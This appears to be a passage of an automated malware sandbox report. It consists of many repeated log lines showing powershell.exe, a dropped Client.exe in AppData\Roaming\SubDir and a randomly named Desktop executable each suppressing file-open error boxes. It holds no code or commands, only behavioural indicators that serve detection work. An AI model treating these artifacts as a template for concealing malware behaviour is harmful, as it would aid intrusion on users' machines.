                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
